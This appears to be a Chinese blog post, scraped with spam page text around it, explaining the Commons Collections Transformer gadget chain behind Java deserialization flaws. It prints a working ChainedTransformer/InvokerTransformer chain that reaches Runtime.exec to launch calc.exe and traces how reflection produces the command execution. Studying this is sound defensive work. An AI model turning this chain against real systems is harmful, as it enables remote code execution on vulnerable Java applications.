91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

java反序列化 - Transformer類可以執行惡意代碼的原理

發布時間:2020-07-31 02:28:34 來源:網絡 閱讀:1206 作者:wx5b0b88843cb2a 欄目:安全技術

java反序列化 - Transformer類可以執行惡意代碼的原理

0x00 代碼

Transformer[] transformers = new Transformer[]{
                  new ConstantTransformer(Runtime.class),
                  new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class},new Object[]{"getRuntime", new Class[0]}),
                  new InvokerTransformer("invoke", new Class[]{Object.class,Object[].class},new Object[]{null, new Object[0]}),
                  new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe",}),
          };
          Transformer transformerChain = new ChainedTransformer(transformers);

          ByteArrayOutputStream out = new ByteArrayOutputStream();
          ObjectOutputStream objOut;

        try {
            objOut = new ObjectOutputStream(out);
            objOut.writeObject(transformerChain);

            transformerChain.transform(null);

        } catch (IOException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }

執行結果:
java反序列化 - Transformer類可以執行惡意代碼的原理

0x01 Transformer類為什么可以執行惡意代碼?

transformerChain.transform(null); 執行的是:ChainedTransformer類的transform方法

    public Object transform(Object object) {
        for (int i = 0; i < iTransformers.length; i++) {
            object = iTransformers[i].transform(object);
        }
        return object;
    }

object = iTransformers[i].transform(object); 執行的是InvokerTransformer類的transform方法

 public Object transform(Object input) {
        if (input == null) {
            return null;
        }
        try {
            Class cls = input.getClass();
            Method method = cls.getMethod(iMethodName, iParamTypes);
            return method.invoke(input, iArgs);

        } catch (NoSuchMethodException ex) {
            throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist");
        } catch (IllegalAccessException ex) {
            throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
        } catch (InvocationTargetException ex) {
            throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex);
        }
    }

java反序列化 - Transformer類可以執行惡意代碼的原理
通過反射機制調用runtime.class的getMethod方法,繼續調用invoke方法生成了一個runtime的對象,最后執行該對象的exec方法,因此造成了反序列化漏洞。
可以參考:
https://blog.51cto.com/13770310/2159962 的0x03 補充

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

四平市| 库伦旗| 玉龙| 横峰县| 瑞安市| 无为县| 渭源县| 云安县| 巴彦淖尔市| 昌平区| 淄博市| 都匀市| 和硕县| 贵南县| 滦南县| 南丰县| 泌阳县| 信宜市| 简阳市| 大城县| 麦盖提县| 黄大仙区| 佛山市| 延津县| 青州市| 辽宁省| 志丹县| 上杭县| 乌鲁木齐县| 古蔺县| 高密市| 曲周县| 灵台县| 怀宁县| 普格县| 正阳县| 达孜县| 多伦县| 稻城县| 清原| 乌拉特前旗|